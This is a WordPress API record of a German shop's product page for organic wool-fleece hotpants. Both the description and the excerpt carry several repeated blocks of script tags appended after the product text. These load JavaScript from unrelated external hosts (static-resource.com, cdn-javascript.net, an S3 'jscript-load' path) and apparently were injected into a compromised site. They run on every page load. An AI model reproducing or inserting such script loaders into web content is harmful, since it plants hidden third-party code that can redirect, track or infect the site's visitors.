{"id":476,"date":"2019-07-11T13:59:49","date_gmt":"2019-07-11T11:59:49","guid":{"rendered":"https:\/\/eloasminbarden.de\/shop\/?post_type=product&#038;p=476"},"modified":"2019-07-25T15:24:44","modified_gmt":"2019-07-25T13:24:44","slug":"bardehose-hotpants","status":"publish","type":"product","link":"https:\/\/eloasminbarden.de\/shop\/produkt\/bardehose-hotpants\/","title":{"rendered":"Mondfrauenhose\/Bardehose\/Hotpants"},"content":{"rendered":"<p>Diese &#8222;Bardehose&#8220; oder neudeutsch auch &#8222;Hotpants&#8220; genannt wird aus wunderbarem Wollfleece-Stoff gen\u00e4ht, der von kontrolliert \u00f6kologischer Schafshaltung von der schw\u00e4bischen Alb stammt und auch dort \u00f6kologisch gef\u00e4rbt und hergestellt wird. Vern\u00e4ht wird die Hose am Bodensee. Sie dient insbesondere Frauen als Schutz &amp; W\u00e4rmepolster zu bestimmten Mond &amp; Jahreszeiten als \u00dcberunterhose oder auch bei Yoga und anderen Bewegungsk\u00fcnsten.<\/p>\n<p>Der Artikel wird in der Gr\u00f6\u00dfe M geliefert. Bei Sonderw\u00fcnschen bitte Ma\u00dfe angeben. Farben kommen und gehen. Deshalb bitte noch eine gesonderte Mail an info@eloasminbarden.de senden mit dem entsprechenden Farbwunsch und der Farbkombination.<\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562845009822\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562846392476\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1564060971356\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562845009850\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1562846392493\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1564060971396\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":494,"template":"","meta":[],"product_cat":[32],"product_tag":[],"_links":{"self":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product\/476"}],"collection":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/media\/494"}],"wp:attachment":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/media?parent=476"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product_cat?post=476"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product_tag?post=476"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}